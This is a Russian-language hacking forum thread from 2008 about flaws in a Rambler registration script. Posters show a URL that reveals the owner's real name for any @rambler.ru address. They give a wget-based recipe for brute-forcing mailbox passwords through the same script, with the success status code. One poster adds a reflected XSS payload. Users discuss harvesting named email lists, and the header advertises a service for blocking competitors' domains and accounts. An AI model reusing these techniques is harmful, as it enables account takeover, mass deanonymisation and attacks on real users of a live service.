Форум АНТИЧАТ - узнать ФамилиюИмя владельца мыла @rambler.ru

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
узнать ФамилиюИмя владельца мыла @rambler.ru

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

узнать ФамилиюИмя владельца мыла @rambler.ru

13.06.2008, 10:43

devton

Участник форума

Регистрация: 26.10.2007

Сообщений: 283

Провел на форуме:
2605910

Репутация: 212

узнать ФамилиюИмя владельца мыла @rambler.ru

http://id.rambler.ru/script/reg.cgi?password=666&username=luba@rambler.ru

достаточно просто открыть урл в бровзере - и увидите ЛюбаГиоргис - Firsname и Lastname - имя и фамилию, указанные владельцем мыла при регистрации ящика

самое интересное - похоже, нет ограничений на интенсивность обращения к урлу - получилось сделать около 50.000 запросов со скоростью около 20 запросов\сек. Т.е. легко собрать именную базу мыл на Рамблере

13.06.2008, 10:52

devton

Участник форума

Регистрация: 26.10.2007

Сообщений: 283

Провел на форуме:
2605910

Репутация: 212

П.С. с помощью этого урла можно еще и брутать пароль к ящику @rambler.ru
Если в теле запрошенной страницы (например, http://id.rambler.ru/script/reg.cgi?password=666666&username=luba@rambler.ru) есть код:
<status>1</status>
значит пароль "666666" подошел!

Учитывая отсутствие ограничений на кол-во\скорость подбора пароля получается неплохой "интерфейс" для брута

14.06.2008, 20:37

diman19911

Познающий

Регистрация: 25.05.2008

Сообщений: 59

Провел на форуме:
334109

Репутация: 26

Отправить сообщение для diman19911 с помощью ICQ

а если <status>2</status>
то что тогда пароль не подходит?

14.06.2008, 20:42

~~mad_xakep~~

Banned

Регистрация: 10.04.2007

Сообщений: 244

Провел на форуме:
2582771

Репутация: 264

Отправить сообщение для mad_xakep с помощью ICQ

хм правду работает! первый раз про это слышу! спс

14.06.2008, 20:42

devton

Участник форума

Регистрация: 26.10.2007

Сообщений: 283

Провел на форуме:
2605910

Репутация: 212

мда блин

используя етот status можно брутить пароли к рамбл-ящику чз веб-интерфейс

14.06.2008, 21:08

SeTM

Новичок

Регистрация: 11.06.2008

Сообщений: 29

Провел на форуме:
340480

Репутация: 11

Цитата:

Сообщение от devton

мда блин

используя етот status можно брутить пароли к рамбл-ящику чз веб-интерфейс

причем очень легко...

14.06.2008, 21:18

X-Venom

Постоянный

Регистрация: 29.04.2008

Сообщений: 913

Провел на форуме:
10460911

Репутация: 1031

Отправить сообщение для X-Venom с помощью ICQ

Можна это все реализовать в брут пока бага еще свежая=)

14.06.2008, 21:43

devton

Участник форума

Регистрация: 26.10.2007

Сообщений: 283

Провел на форуме:
2605910

Репутация: 212

реализовать в брут

писать нич0 не надо - достаточно сгенерить или собрать файлик с паролями, перед каждым паролем вставить "http://id.rambler.ru/script/reg.cgi?username=luba@rambler.ru&password=", сохранить файлик как "brute.txt", запустить:

wget -i brute.txt

и брут начнецца

14.06.2008, 21:51

Sleep

Участник форума

Регистрация: 31.10.2007

Сообщений: 193

Провел на форуме:
2080216

Репутация: 150

Отправить сообщение для Sleep с помощью ICQ

Пасивная XSS
http://id.rambler.ru/script/reg.cgi?username=<script>alert('XSS')</script>

#10

16.06.2008, 00:10

Vallez

Участник форума

Регистрация: 25.12.2005

Сообщений: 151

Провел на форуме:
874713

Репутация: 53

devton подскажи способ что бы быстро вставить ссылку перед каждым паролем )

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Методы "вспоминания" пароля (от мыла)	censored!	E-Mail	175	05.06.2010 16:57
Как узнать пароль от мыла на list.ru?	bike	E-Mail	16	21.02.2006 15:11
Как узнать ПАСС ОТ МЫЛА	=Be$=	E-Mail	5	24.01.2006 15:12

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход